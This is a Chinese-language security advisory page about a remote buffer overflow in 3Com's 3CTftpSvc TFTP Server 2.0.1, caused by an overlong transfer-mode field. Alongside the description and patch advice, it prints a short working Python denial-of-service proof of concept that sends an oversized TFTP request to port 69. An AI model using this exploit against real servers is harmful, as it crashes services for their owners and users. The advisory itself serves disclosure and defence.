首页 -> 安全研究

安全研究

安全漏洞
3Com TFTP超长传输模式字段远程缓冲区溢出漏洞

发布日期:2006-11-27
更新日期:2006-11-29

受影响系统:
3Com 3CTftpSvc TFTP Server 2.0.1
描述:
BUGTRAQ  ID: 21301

3CTftpSvc是一款Windows 9x/NT/XP平台下的TFTP服务器,实现TFTPv2协议。

3CTftpSvc在处理超长畸形的请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。

3CTftpSvc TFTP服务器在处理传送给GET或PUT命令的超长传输模式(大于470字节)时存在缓冲区溢出。如果攻击者向服务器发送了特制报文请求的话就会触发这个漏洞,导致拒绝服务或执行任意指令。

<*来源:Liu Qixu (liuqx@nipc.org.cn
  
  链接:http://secunia.com/advisories/23113/
        http://marc.theaimsgroup.com/?l=bugtraq&m=116465920720302&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC

import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"        
    sys.exit(1)

filename = "A"
mode = "netascii" + "A" * 469
da = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(da, (host, port))

建议:
厂商补丁:

3Com
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://support.3com.com/software/utilities_for_windows_32_bit.htm

浏览次数:4455
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障